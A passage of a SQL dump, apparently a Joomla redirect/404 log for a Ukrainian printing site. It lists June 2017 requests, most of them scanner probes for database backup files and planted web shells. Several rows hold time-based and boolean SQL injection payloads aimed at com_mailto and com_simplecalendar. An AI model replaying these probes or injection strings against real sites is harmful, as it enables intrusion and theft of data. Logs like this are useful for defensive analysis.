00:00:00',301),(9881,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/conf.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/conf.php','',2,0,'2017-06-05 10:12:14','0000-00-00 00:00:00',301),(9882,'http://ekvatorprint.com.ua/dbdump.sql.gz',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-05 14:32:35','0000-00-00 00:00:00',301),(9883,'http://ekvatorprint.com.ua/db.tar',NULL,'ekvatorprint.com.ua','',4,0,'2017-06-05 14:33:13','0000-00-00 00:00:00',301),(9884,'http://ekvatorprint.com.ua/dump.gz',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-05 14:35:30','0000-00-00 00:00:00',301),(9885,'http://ekvatorprint.com.ua/dump.sql.zip',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-05 14:42:12','0000-00-00 00:00:00',301),(9886,'http://ekvatorprint.com.ua/temp.sql',NULL,'ekvatorprint.com.ua','',3,0,'2017-06-05 14:42:57','0000-00-00 00:00:00',301),(9887,'http://ekvatorprint.com.ua/db.sql.bz2',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-05 14:50:30','0000-00-00 00:00:00',301),(9888,'http://ekvatorprint.com.ua/db.sql.gz',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-05 14:55:12','0000-00-00 00:00:00',301),(9889,'http://ekvatorprint.com.ua/db.tar.gz',NULL,'ekvatorprint.com.ua','',4,0,'2017-06-05 14:58:38','0000-00-00 00:00:00',301),(9890,'http://ekvatorprint.com.ua/sql.gz',NULL,'ekvatorprint.com.ua','',3,0,'2017-06-05 14:58:52','0000-00-00 00:00:00',301),(9891,'http://ekvatorprint.com.ua/mysql.zip',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-05 15:02:29','0000-00-00 00:00:00',301),(9892,'http://ekvatorprint.com.ua/db_backup.sql',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-05 15:11:43','0000-00-00 00:00:00',301),(9893,'http://ekvatorprint.com.ua/db.sql.zip',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-05 15:25:59','0000-00-00 00:00:00',301),(9894,'http://ekvatorprint.com.ua/backup.sql.gz',NULL,'ekvatorprint.com.ua','',3,0,'2017-06-05 15:26:39','0000-00-00 00:00:00',301),(9895,'http://ekvatorprint.com.ua/db.zip',NULL,'ekvatorprint.com.ua','',4,0,'2017-06-05 15:27:42','0000-00-00 00:00:00',301),(9896,'http://ekvatorprint.com.ua/sql.tar.gz',NULL,'ekvatorprint.com.ua','',3,0,'2017-06-05 15:43:10','0000-00-00 00:00:00',301),(9897,'http://ekvatorprint.com.ua/mysql.sql',NULL,'ekvatorprint.com.ua','',2,0,'2017-06-05 15:50:49','0000-00-00 00:00:00',301),(9898,'http://ekvatorprint.com.ua/dbdump.sql',NULL,'ekvatorprint.com.ua','',3,0,'2017-06-05 15:51:00','0000-00-00 00:00:00',301),(9899,'http://ekvatorprint.com.ua/backup.sql.bz2',NULL,'ekvatorprint.com.ua','',1,0,'2017-06-05 15:56:37','0000-00-00 00:00:00',301),(9900,'http://ekvatorprint.com.ua/printing-on-canvas/gclid',NULL,'','',2,0,'2017-06-05 19:05:00','0000-00-00 00:00:00',301),(9901,'http://ekvatorprint.com.ua/banner-printing/gclid',NULL,'','',1,0,'2017-06-05 19:05:31','0000-00-00 00:00:00',301),(9902,'http://ekvatorprint.com.ua/wp-content/themes/u-design/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/u-design/style.css','',6,0,'2017-06-06 00:43:31','0000-00-00 00:00:00',301),(9903,'http://ekvatorprint.com.ua/random.php',NULL,'','',4,0,'2017-06-06 13:00:16','0000-00-00 00:00:00',301),(9904,'http://ekvatorprint.com.ua/cod.php',NULL,'','',5,0,'2017-06-06 20:18:16','0000-00-00 00:00:00',301),(9905,'http://ekvatorprint.com.ua/wp-mosx.php?x=1',NULL,'','',3,0,'2017-06-07 03:44:58','0000-00-00 00:00:00',301),(9906,'http://ekvatorprint.com.ua/maps.php',NULL,'','',3,0,'2017-06-07 11:14:21','0000-00-00 00:00:00',301),(9907,'http://ekvatorprint.com.ua/libraries/cms/captcha/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/libraries/cms/captcha/advanced_settings.php','',1,0,'2017-06-07 16:53:16','0000-00-00 00:00:00',301),(9908,'http://ekvatorprint.com.ua/defined.php',NULL,'http://ekvatorprint.com.ua/defined.php','',3,0,'2017-06-07 18:01:35','0000-00-00 00:00:00',301),(9909,'http://ekvatorprint.com.ua/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/advanced_settings.php','',1,0,'2017-06-07 18:07:50','0000-00-00 00:00:00',301),(9910,'http://ekvatorprint.com.ua/modules/mod_articles_archive/tmpl/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles_archive/tmpl/advanced_settings.php','',1,0,'2017-06-07 19:22:22','0000-00-00 00:00:00',301),(9911,'http://ekvatorprint.com.ua/images/newshell.php',NULL,'http://ekvatorprint.com.ua/images/newshell.php','',1,0,'2017-06-07 20:22:57','0000-00-00 00:00:00',301),(9912,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/images/backgrounds/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/images/backgrounds/advanced_settings.php','',1,0,'2017-06-07 21:25:26','0000-00-00 00:00:00',301),(9913,'http://ekvatorprint.com.ua/administrator/components/com_finder/models/forms/path/lndex.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_finder/models/forms/path/lndex.php','',1,0,'2017-06-07 21:46:31','0000-00-00 00:00:00',301),(9914,'http://ekvatorprint.com.ua/components/com_ag_google_analytics2/googlexml.php',NULL,'http://ekvatorprint.com.ua/components/com_ag_google_analytics2/googlexml.php','',1,0,'2017-06-07 22:30:10','0000-00-00 00:00:00',301),(9915,'http://ekvatorprint.com.ua/tmp/wp-ajax.php',NULL,'http://ekvatorprint.com.ua/tmp/wp-ajax.php','',1,0,'2017-06-07 23:30:27','0000-00-00 00:00:00',301),(9916,'http://ekvatorprint.com.ua/plugins/user/profile/profiles/mail.php',NULL,'http://ekvatorprint.com.ua/plugins/user/profile/profiles/mail.php','',1,0,'2017-06-07 23:31:54','0000-00-00 00:00:00',301),(9917,'http://ekvatorprint.com.ua/images/articles/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/images/articles/advanced_settings.php','',1,0,'2017-06-07 23:32:29','0000-00-00 00:00:00',301),(9918,'http://ekvatorprint.com.ua/templates/beez/fc61.php',NULL,'http://ekvatorprint.com.ua/templates/beez/fc61.php','',1,0,'2017-06-07 23:34:12','0000-00-00 00:00:00',301),(9919,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/includes/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/includes/advanced_settings.php','',1,0,'2017-06-07 23:35:38','0000-00-00 00:00:00',301),(9920,'http://ekvatorprint.com.ua/media/cms/css/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/media/cms/css/advanced_settings.php','',1,0,'2017-06-08 00:32:03','0000-00-00 00:00:00',301),(9921,'http://ekvatorprint.com.ua/templates/beez/db.php',NULL,'http://ekvatorprint.com.ua/templates/beez/db.php','',1,0,'2017-06-08 00:33:34','0000-00-00 00:00:00',301),(9922,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/img/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/img/advanced_settings.php','',1,0,'2017-06-08 00:35:15','0000-00-00 00:00:00',301),(9923,'http://ekvatorprint.com.ua/printing-on-canvas&nb=12',NULL,'','',9,0,'2017-06-08 01:04:33','0000-00-00 00:00:00',301),(9924,'http://ekvatorprint.com.ua/includes/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/includes/advanced_settings.php','',1,0,'2017-06-08 01:43:25','0000-00-00 00:00:00',301),(9925,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/css/colors/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/css/colors/advanced_settings.php','',1,0,'2017-06-08 01:45:54','0000-00-00 00:00:00',301),(9926,'http://ekvatorprint.com.ua/indax.php',NULL,'','',3,0,'2017-06-08 02:09:55','0000-00-00 00:00:00',301),(9927,'http://ekvatorprint.com.ua/modules/mod_mapsapi/cache.php',NULL,'http://ekvatorprint.com.ua/modules/mod_mapsapi/cache.php','',1,0,'2017-06-08 05:38:09','0000-00-00 00:00:00',301),(9928,'http://ekvatorprint.com.ua/components/com_jce/help.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/help.php','',1,0,'2017-06-08 05:39:16','0000-00-00 00:00:00',301),(9929,'http://ekvatorprint.com.ua/templates/rhuk_milkyway/simple.php',NULL,'http://ekvatorprint.com.ua/templates/rhuk_milkyway/simple.php','',1,0,'2017-06-08 07:08:31','0000-00-00 00:00:00',301),(9930,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/js/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/js/advanced_settings.php','',1,0,'2017-06-08 07:12:36','0000-00-00 00:00:00',301),(9931,'http://ekvatorprint.com.ua/administrator/components/com_joomgallery/views/comments/path/lndex.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_joomgallery/views/comments/path/lndex.php','',1,0,'2017-06-08 08:15:44','0000-00-00 00:00:00',301),(9932,'http://ekvatorprint.com.ua/administrator/components/com_menus/models/forms/path/lndex.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_menus/models/forms/path/lndex.php','',1,0,'2017-06-08 08:21:13','0000-00-00 00:00:00',301),(9933,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/language/en-gb/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/language/en-gb/advanced_settings.php','',1,0,'2017-06-08 09:33:26','0000-00-00 00:00:00',301),(9934,'http://ekvatorprint.com.ua/modules/mod_articlemanage/mod_articlemanage.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articlemanage/mod_articlemanage.php','',1,0,'2017-06-08 09:51:26','0000-00-00 00:00:00',301),(9935,'http://ekvatorprint.com.ua/jm-ajax/upload_file',NULL,'','',1,0,'2017-06-08 15:43:21','0000-00-00 00:00:00',301),(9936,'http://ekvatorprint.com.ua/index1.php',NULL,'http://ekvatorprint.com.ua/index1.php','',4,0,'2017-06-09 05:59:06','0000-00-00 00:00:00',301),(9937,'http://ekvatorprint.com.ua/administrator/jm.php',NULL,'http://ekvatorprint.com.ua/administrator/jm.php','',1,0,'2017-06-09 07:05:36','0000-00-00 00:00:00',301),(9938,'http://ekvatorprint.com.ua/templates/patrachess/bootstrap/css/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/templates/patrachess/bootstrap/css/advanced_settings.php','',1,0,'2017-06-09 07:59:26','0000-00-00 00:00:00',301),(9939,'http://ekvatorprint.com.ua/modules/mod_sape/mod_sape.php',NULL,'http://ekvatorprint.com.ua/modules/mod_sape/mod_sape.php','',1,0,'2017-06-09 07:59:51','0000-00-00 00:00:00',301),(9940,'http://ekvatorprint.com.ua/language/el-gr/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/language/el-gr/advanced_settings.php','',1,0,'2017-06-09 08:13:43','0000-00-00 00:00:00',301),(9941,'http://ekvatorprint.com.ua/plugins/content/finder/config.php',NULL,'http://ekvatorprint.com.ua/plugins/content/finder/config.php','',1,0,'2017-06-09 08:22:31','0000-00-00 00:00:00',301),(9942,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/html/com_content/archive/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/templates/pjo_zonada_free/html/com_content/archive/advanced_settings.php','',1,0,'2017-06-09 10:07:46','0000-00-00 00:00:00',301),(9943,'http://ekvatorprint.com.ua/components/com_attachments/controllers/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/components/com_attachments/controllers/advanced_settings.php','',1,0,'2017-06-09 10:10:48','0000-00-00 00:00:00',301),(9944,'http://ekvatorprint.com.ua/index.php?change_font=small&func=1&Itemid=55&lang=en&option=com_kunena&q=Search Forum',NULL,'http://www.google.com/','',1,0,'2017-06-09 10:18:27','0000-00-00 00:00:00',301),(9945,'http://ekvatorprint.com.ua/images/jm.php',NULL,'http://ekvatorprint.com.ua/images/jm.php','',1,0,'2017-06-09 10:18:37','0000-00-00 00:00:00',301),(9946,'http://ekvatorprint.com.ua/index.php?change_css=orange&Itemid=1&lang=en&layout=1&limit=9&option=com_content&quot;=&quot;-data-center-of-the-future-previews-in-downtown-los-angeles=&view=frontpage',NULL,'http://www.google.com/','',1,0,'2017-06-09 12:01:08','0000-00-00 00:00:00',301),(9947,'http://ekvatorprint.com.ua/index.php?change_css=orange&Itemid=1&lang=en&layout=default&limit=1&option=com_content&quot;=&quot;-data-center-of-the-future-previews-in-downtown-los-angeles=&view=frontpage',NULL,'http://www.google.com/','',1,0,'2017-06-09 13:24:29','0000-00-00 00:00:00',301),(9948,'http://ekvatorprint.com.ua/index.php?change_css=orange&func=1&lang=en&option=com_kunena',NULL,'http://www.google.com/','',1,0,'2017-06-09 14:48:12','0000-00-00 00:00:00',301),(9949,'http://ekvatorprint.com.ua/index.php?change_font=small&childforums=1&exactname=1&func=1&Itemid=55&lang=en&limit=5&option=com_kunena&order=inc&q=1&searchdate=lastvisit&searchuser=uvgumbls&sortby=title',NULL,'http://www.google.com/','',1,0,'2017-06-09 16:12:30','0000-00-00 00:00:00',301),(9950,'http://ekvatorprint.com.ua/index.php?beforeafter=before&catids=4&change_css=green&childforums=1&exactname=1&func=1&Itemid=55&lang=en&limit=5&option=com_kunena&order=inc&q=1&searchdate=lastvisit&searchuser=wxhoktyl&sortby=title',NULL,'http://www.google.com/','',1,0,'2017-06-09 17:38:45','0000-00-00 00:00:00',301),(9951,'http://ekvatorprint.com.ua/index.php?change_font=medium&func=1&Itemid=55&lang=en&limitstart=17370&option=com_kunena',NULL,'http://www.google.com/','',1,0,'2017-06-09 19:03:07','0000-00-00 00:00:00',301),(9952,'http://ekvatorprint.com.ua/index.php?change_css=red&direction=ASC&func=1&Itemid=55&lang=en&option=com_kunena&orderby=registerDate',NULL,'http://www.google.com/','',1,0,'2017-06-09 20:29:54','0000-00-00 00:00:00',301),(9953,'http://ekvatorprint.com.ua/index.php?change_font=large&direction=ASC&func=1&Itemid=55&lang=en&option=com_kunena&orderby=registerDate',NULL,'http://www.google.com/','',1,0,'2017-06-09 21:54:07','0000-00-00 00:00:00',301),(9954,'http://ekvatorprint.com.ua/index.php?change_font=small&func=1&Itemid=55&lang=en&option=com_kunena',NULL,'http://www.google.com/','',1,0,'2017-06-09 23:18:18','0000-00-00 00:00:00',301),(9955,'http://ekvatorprint.com.ua/index.php?change_css=green&gid=1&Itemid=56&lang=en&option=com_docman&task=cat_view',NULL,'http://www.google.com/','',1,0,'2017-06-10 00:42:28','0000-00-00 00:00:00',301),(9956,'http://ekvatorprint.com.ua/index.php?change_css=green&gid=35&Itemid=56&lang=1&option=com_docman&task=cat_view',NULL,'http://www.google.com/','',1,0,'2017-06-10 02:06:45','0000-00-00 00:00:00',301),(9957,'http://ekvatorprint.com.ua/index.php?change_css=green&gid=35&Itemid=56&lang=en&option=com_docman&task=1',NULL,'http://www.google.com/','',1,0,'2017-06-10 03:31:07','0000-00-00 00:00:00',301),(9958,'http://ekvatorprint.com.ua/index.php?change_font=large&Itemid=56&lang=1&option=com_docman&task=search_form',NULL,'http://www.google.com/','',1,0,'2017-06-10 08:46:13','0000-00-00 00:00:00',301),(9959,'http://ekvatorprint.com.ua/index.php?change_font=medium&Itemid=56&lang=en&option=com_docman&task=1',NULL,'http://www.google.com/','',1,0,'2017-06-10 10:14:56','0000-00-00 00:00:00',301),(9960,'http://ekvatorprint.com.ua/index.php?change_font=small&Itemid=1&lang=1&layout=default&limit=9&option=com_content&quot;-says-epicura-skin=&quot;rejuve-anti-aging-serum-now-offered-with-a-50%-pre-christmas-off,=&view=frontpage',NULL,'http://www.google.com/','',1,0,'2017-06-10 20:33:08','0000-00-00 00:00:00',301),(9961,'http://ekvatorprint.com.ua/index.php?change_font=medium&Itemid=1&lang=en&layout=1&limit=9&option=com_content&quot;-says-epicura-skin=&quot;rejuve-anti-aging-serum-now-offered-with-a-50%-pre-christmas-off,=&view=frontpage',NULL,'http://www.google.com/','',1,0,'2017-06-10 21:59:40','0000-00-00 00:00:00',301),(9962,'http://ekvatorprint.com.ua/index.php?change_font=large&Itemid=1&lang=en&layout=default&limit=1&option=com_content&quot;-says-epicura-skin=&quot;rejuve-anti-aging-serum-now-offered-with-a-50%-pre-christmas-off,=&view=frontpage',NULL,'http://www.google.com/','',1,0,'2017-06-10 23:26:16','0000-00-00 00:00:00',301),(9963,'http://ekvatorprint.com.ua/index.php?change_font=large&Itemid=67&lang=1&layout=default&option=com_content&view=category',NULL,'http://www.google.com/','',1,0,'2017-06-11 00:52:44','0000-00-00 00:00:00',301),(9964,'http://ekvatorprint.com.ua/index.php?change_font=medium&Itemid=67&lang=en&layout=1&option=com_content&view=category',NULL,'http://www.google.com/','',1,0,'2017-06-11 02:17:26','0000-00-00 00:00:00',301),(9965,'http://ekvatorprint.com.ua/component/option,com_mailto/link,aHR0cDovLzR0ZXh0aWxlLnJ1L25vdm9zdGktdGVrc3RpbG5vaWUtcHJvbWlzaGxlbm5vc3RpL2RtLXRleHRpbGUtbmV3cy5odG1s/(select(0)from(select(sleep(0)))v)/*\'+(select(0)from(select(sleep(0)))v)+\'\"+(select(0)from(select(sleep(0)))v)+\"*/,component/',NULL,'http://www.google.com/','',1,0,'2017-06-11 05:04:56','0000-00-00 00:00:00',301),(9966,'http://ekvatorprint.com.ua/component/option,com_mailto/-1\' OR 3*2*1=6 AND 000243=000243 -- ,aHR0cDovLzR0ZXh0aWxlLnJ1L29ib3J1ZG92YW5pZS8xMDAuaHRtbA==/tmpl,component/',NULL,'http://www.google.com/','',1,0,'2017-06-11 07:51:12','0000-00-00 00:00:00',301),(9967,'http://ekvatorprint.com.ua/index.php?option=com_videoflow',NULL,'','',1,0,'2017-06-11 10:25:25','0000-00-00 00:00:00',301),(9968,'http://ekvatorprint.com.ua/blogs/wp-admin/setup-config.php',NULL,'','',6,0,'2017-06-13 01:21:07','0000-00-00 00:00:00',301),(9969,'http://ekvatorprint.com.ua/beta/wp-admin/setup-config.php',NULL,'','',8,0,'2017-06-13 01:21:07','0000-00-00 00:00:00',301),(9970,'http://ekvatorprint.com.ua/cms/wp-admin/setup-config.php',NULL,'','',5,0,'2017-06-13 01:21:08','0000-00-00 00:00:00',301),(9971,'http://ekvatorprint.com.ua/new/wp-admin/setup-config.php',NULL,'','',7,0,'2017-06-13 01:21:08','0000-00-00 00:00:00',301),(9972,'http://ekvatorprint.com.ua/Adoni.php',NULL,'','',2,0,'2017-06-13 10:33:33','0000-00-00 00:00:00',301),(9973,'http://ekvatorprint.com.ua/wp-content/plugins/wp-easy-gallery-pro/admin/php.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','',8,0,'2017-06-13 14:23:20','0000-00-00 00:00:00',301),(9974,'http://ekvatorprint.com.ua/media/s.PhP.txt',NULL,'','',1,0,'2017-06-13 15:48:34','0000-00-00 00:00:00',301),(9975,'http://ekvatorprint.com.ua/media/s.txt',NULL,'','',1,0,'2017-06-13 15:48:34','0000-00-00 00:00:00',301),(9976,'http://ekvatorprint.com.ua/wp-sbb.php',NULL,'','',6,0,'2017-06-13 17:05:31','0000-00-00 00:00:00',301),(9977,'http://ekvatorprint.com.ua/sfn.php',NULL,'','',6,0,'2017-06-14 09:02:23','0000-00-00 00:00:00',301),(9978,'http://ekvatorprint.com.ua/components/com_newsfeeds/views/categories/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_newsfeeds/views/categories/tmpl/config.php','',1,0,'2017-06-14 12:50:02','0000-00-00 00:00:00',301),(9979,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/spy.php',NULL,'','',5,0,'2017-06-14 15:12:28','0000-00-00 00:00:00',301),(9980,'http://ekvatorprint.com.ua/administrator/components/com_templates/views/template/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_templates/views/template/config.php','',1,0,'2017-06-14 15:49:43','0000-00-00 00:00:00',301),(9981,'http://ekvatorprint.com.ua/libraries/joomla/github/package/orgs/config.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/github/package/orgs/config.php','',1,0,'2017-06-14 16:54:35','0000-00-00 00:00:00',301),(9982,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/statistics/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/statistics/config.php','',1,0,'2017-06-14 19:27:24','0000-00-00 00:00:00',301),(9983,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/anchor/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/anchor/config.php','',1,0,'2017-06-14 19:36:17','0000-00-00 00:00:00',301),(9984,'http://ekvatorprint.com.ua/administrator/components/com_users/views/group/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_users/views/group/config.php','',1,0,'2017-06-15 00:21:58','0000-00-00 00:00:00',301),(9985,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/legacyoutput/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/legacyoutput/config.php','',1,0,'2017-06-15 02:46:31','0000-00-00 00:00:00',301),(9986,'http://ekvatorprint.com.ua/administrator/components/com_cache/views/cache/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_cache/views/cache/config.php','',1,0,'2017-06-15 02:47:21','0000-00-00 00:00:00',301),(9987,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/views/update/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/views/update/config.php','',1,0,'2017-06-15 03:58:17','0000-00-00 00:00:00',301),(9988,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/indexer/backup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_finder/views/indexer/backup.php','',1,0,'2017-06-15 03:58:23','0000-00-00 00:00:00',301),(9989,'http://ekvatorprint.com.ua/tmp/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/tmp/advanced_settings.php','',1,0,'2017-06-15 04:03:15','0000-00-00 00:00:00',301),(9990,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_search/config.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_search/config.php','',1,0,'2017-06-15 07:44:08','0000-00-00 00:00:00',301),(9991,'http://ekvatorprint.com.ua/plugins/content/settings.phpdel',NULL,'http://ekvatorprint.com.ua/plugins/content/settings.phpdel','',1,0,'2017-06-15 07:51:50','0000-00-00 00:00:00',301),(9992,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_modules/config.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_modules/config.php','',1,0,'2017-06-15 08:56:35','0000-00-00 00:00:00',301),(9993,'http://ekvatorprint.com.ua/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','',4,0,'2017-06-15 09:34:55','0000-00-00 00:00:00',301),(9994,'http://ekvatorprint.com.ua/temp1-1.php',NULL,'http://ekvatorprint.com.ua/temp1-1.php','',3,0,'2017-06-15 10:23:22','0000-00-00 00:00:00',301),(9995,'http://ekvatorprint.com.ua/templates/rt_afterburner_j15/js/gzencode.php',NULL,'http://ekvatorprint.com.ua/templates/rt_afterburner_j15/js/gzencode.php','',1,0,'2017-06-15 11:37:25','0000-00-00 00:00:00',301),(9996,'http://ekvatorprint.com.ua/component/option,com_mailto/link,aHR0cDovLzR0ZXh0aWxlLnJ1L29ib3J1ZG92YW5pZS8xMDAuaHRtbA==/if(now()=sysdate(),sleep(0),0)/*\'XOR(if(now()=sysdate(),sleep(0),0))OR\'\"XOR(if(now()=sysdate(),sleep(0),0))OR\"*/,component/',NULL,'http://www.google.com/','',1,0,'2017-06-15 13:16:07','0000-00-00 00:00:00',301),(9997,'http://ekvatorprint.com.ua/components/com_mailto/views/mailto/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_mailto/views/mailto/tmpl/config.php','',1,0,'2017-06-15 17:47:55','0000-00-00 00:00:00',301),(9998,'http://ekvatorprint.com.ua/administrator/components/com_banners/helpers/html/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/helpers/html/config.php','',1,0,'2017-06-15 20:07:35','0000-00-00 00:00:00',301),(9999,'http://ekvatorprint.com.ua/components/com_config/view/templates/tmpl/config.php',NULL,'http://ekvatorprint.com.ua/components/com_config/view/templates/tmpl/config.php','',1,0,'2017-06-15 21:19:40','0000-00-00 00:00:00',301),(10000,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/discover/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/discover/config.php','',1,0,'2017-06-15 23:36:01','0000-00-00 00:00:00',301),(10001,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_installer/config.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_installer/config.php','',1,0,'2017-06-15 23:43:04','0000-00-00 00:00:00',301),(10002,'http://ekvatorprint.com.ua/images/banners/advanced_settings.php',NULL,'http://ekvatorprint.com.ua/images/banners/advanced_settings.php','',1,0,'2017-06-16 00:45:08','0000-00-00 00:00:00',301),(10003,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/banner/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/banner/config.php','',1,0,'2017-06-16 03:05:30','0000-00-00 00:00:00',301),(10004,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/mirc/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/mirc/config.php','',1,0,'2017-06-16 04:03:53','0000-00-00 00:00:00',301),(10005,'http://ekvatorprint.com.ua/printing-on-canvas30',NULL,'http://away.vk.com/away.php','',2,0,'2017-06-16 07:36:37','0000-00-00 00:00:00',301),(10006,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/fullpage/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/tinymce/plugins/fullpage/config.php','',1,0,'2017-06-16 08:56:40','0000-00-00 00:00:00',301),(10007,'http://ekvatorprint.com.ua/plugins/content/apismtp/mysql.phpdel',NULL,'http://ekvatorprint.com.ua/plugins/content/apismtp/mysql.phpdel','',1,0,'2017-06-16 08:57:02','0000-00-00 00:00:00',301),(10008,'http://ekvatorprint.com.ua/modules/mod_xmlrpc/mod_xmlrpc.phpdel',NULL,'http://ekvatorprint.com.ua/modules/mod_xmlrpc/mod_xmlrpc.phpdel','',1,0,'2017-06-16 11:27:03','0000-00-00 00:00:00',301),(10009,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_categories/config.php',NULL,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_categories/config.php','',1,0,'2017-06-16 13:57:58','0000-00-00 00:00:00',301),(10010,'http://ekvatorprint.com.ua/component/option,com_mailto/link,aHR0cDovLzR0ZXh0aWxlLnJ1L29ib3J1ZG92YW5pZS8xMDAuaHRtbA==/tmpl,if(now()=sysdate(),sleep(0),0)/*\'XOR(if(now()=sysdate(),sleep(0),0))OR\'\"XOR(if(now()=sysdate(),sleep(0),0))OR\"*/',NULL,'http://www.google.com/','',1,0,'2017-06-16 14:14:23','0000-00-00 00:00:00',301),(10011,'http://ekvatorprint.com.ua/administrator/components/com_messages/models/forms/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_messages/models/forms/config.php','',1,0,'2017-06-16 16:33:17','0000-00-00 00:00:00',301),(10012,'http://ekvatorprint.com.ua/administrator/components/com_installer/helpers/html/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_installer/helpers/html/config.php','',2,0,'2017-06-16 16:40:10','0000-00-00 00:00:00',301),(10013,'http://ekvatorprint.com.ua/administrator/components/com_messages/views/messages/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_messages/views/messages/config.php','',1,0,'2017-06-16 16:43:08','0000-00-00 00:00:00',301),(10014,'http://ekvatorprint.com.ua/content-wrapper.php',NULL,'http://ekvatorprint.com.ua/content-wrapper.php','',3,0,'2017-06-16 17:36:13','0000-00-00 00:00:00',301),(10015,'http://ekvatorprint.com.ua/media/widgetkit/widgets/gallery/styles/showcase/images/gethostbynamel.php',NULL,'http://ekvatorprint.com.ua/media/widgetkit/widgets/gallery/styles/showcase/images/gethostbynamel.php','',1,0,'2017-06-16 17:37:23','0000-00-00 00:00:00',301),(10016,'http://ekvatorprint.com.ua/administrator/components/com_banners/models/forms/config.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/models/forms/config.php','',1,0,'2017-06-16 17:39:40','0000-00-00 00:00:00',301),(10017,'http://ekvatorprint.com.ua/media/editors/codemirror/addon/edit/config.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/addon/edit/config.php','',2,0,'2017-06-16 17:41:30','0000-00-00 00:00:00',301),(10018,'http://ekvatorprint.com.ua/component/-1\' OR 3*2*1=6 AND 00024=00024 -- ,com_simplecalendar/Itemid,57/catid,/format,pdf/view,calendar',NULL,'http://www.google.com/','',1,0,'2017-06-16 17:48:37','0000-00-00 00:00:00',301),(10019,'http://ekvatorprint.com.ua/images/headers/smile.php',NULL,'http://ekvatorprint.com.ua/images/headers/smile.php','',8,0,'2017-06-16 18:51:44','0000-00-00 